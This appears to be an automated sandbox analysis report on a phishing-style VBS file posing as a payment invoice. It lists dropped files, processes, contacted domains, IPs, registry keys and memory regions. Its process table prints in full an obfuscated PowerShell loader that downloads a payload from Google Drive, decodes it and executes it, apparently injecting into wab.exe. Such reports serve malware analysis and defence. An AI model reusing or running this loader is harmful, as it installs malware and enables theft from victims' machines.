Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Outstanding Payment Invoice PO 3400375980.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1k2ccmec.0o4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rbafh4d.xyv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iekto4vw.hwm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukpw2guh.4rj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Salvuyr.Qui
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Outstanding Payment Invoice PO 3400375980.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5;
$Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function
Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa
E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr
Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2
Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0
Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize
' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc
incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe
tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY
ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize
'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak%
.rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver
Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV
mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds
FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco
riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun
te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai
chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta
Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc
oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse.
');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn
eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi
L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn
Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve
st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee
Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize
' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas
Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve
');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk
FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr
Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl
An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh
Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ')
;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye
.pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber
riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1
Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize
' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal
Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc
EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk
eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet
Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso
$Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb
PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng
DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic
ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN
raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal
Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi
gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg
,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5;
$Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function
Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa
E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr
Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2
Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0
Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize
' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc
incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe
tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY
ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize
'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak%
.rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver
Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV
mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds
FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco
riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun
te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai
chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta
Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc
oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse.
');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn
eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi
L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn
Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve
st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee
Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize
' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas
Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve
');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk
FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr
Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl
An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh
Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ')
;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye
.pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber
riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1
Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize
' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal
Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc
EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk
eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet
Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso
$Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb
PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng
DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic
ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN
raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal
Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi
gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg
,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.usercontent.google.comv
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
electricistas-24hs.com.ar
|
209.126.127.33
|
||
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
drive.google.com
|
173.194.219.139
|
||
|
drive.usercontent.google.com
|
142.250.105.132
|
||
|
api.ipify.org
|
104.26.13.205
|
||
|
ip-api.com
|
208.95.112.1
|
||
|
mail.electricistas-24hs.com.ar
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
173.194.219.139
|
drive.google.com
|
United States
|
||
|
142.250.105.132
|
drive.usercontent.google.com
|
United States
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
||
|
209.126.127.33
|
electricistas-24hs.com.ar
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
AA47000
|
direct allocation
|
page execute and read and write
|
|
|
|
21DE5000
|
trusted library allocation
|
page read and write
|
|
|
|
5617000
|
remote allocation
|
page execute and read and write
|
|
|
|
21E0C000
|
trusted library allocation
|
page read and write
|
|
|
|
2421FCC4000
|
trusted library allocation
|
page read and write
|
|
|
|
6071000
|
trusted library allocation
|
page read and write
|
|
|
|
21E20000
|
trusted library allocation
|
page read and write
|
|
|
|
8B70000
|
direct allocation
|
page execute and read and write
|
|
|
|
31BC000
|
heap
|
page read and write
|
||
|
734C000
|
stack
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11B0000
|
trusted library allocation
|
page read and write
|
||
|
5DE9000
|
trusted library allocation
|
page read and write
|
||
|
24211BD8000
|
trusted library allocation
|
page read and write
|
||
|
4BE8000
|
heap
|
page read and write
|
||
|
21E08000
|
trusted library allocation
|
page read and write
|
||
|
9647000
|
direct allocation
|
page execute and read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
7DF49F8C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B50000
|
trusted library allocation
|
page read and write
|
||
|
8A9D000
|
stack
|
page read and write
|
||
|
8C00000
|
direct allocation
|
page read and write
|
||
|
FFE67FF000
|
stack
|
page read and write
|
||
|
7FF7C0E60000
|
trusted library allocation
|
page read and write
|
||
|
27D58A12000
|
heap
|
page read and write
|
||
|
24228324000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D582C0000
|
heap
|
page read and write
|
||
|
242104E2000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
2420F980000
|
heap
|
page readonly
|
||
|
27D58243000
|
heap
|
page read and write
|
||
|
242104CB000
|
trusted library allocation
|
page read and write
|
||
|
21C50000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
772C000
|
heap
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
27D564C0000
|
heap
|
page read and write
|
||
|
2420F990000
|
trusted library allocation
|
page read and write
|
||
|
23EF7000
|
heap
|
page read and write
|
||
|
2420E1B5000
|
heap
|
page read and write
|
||
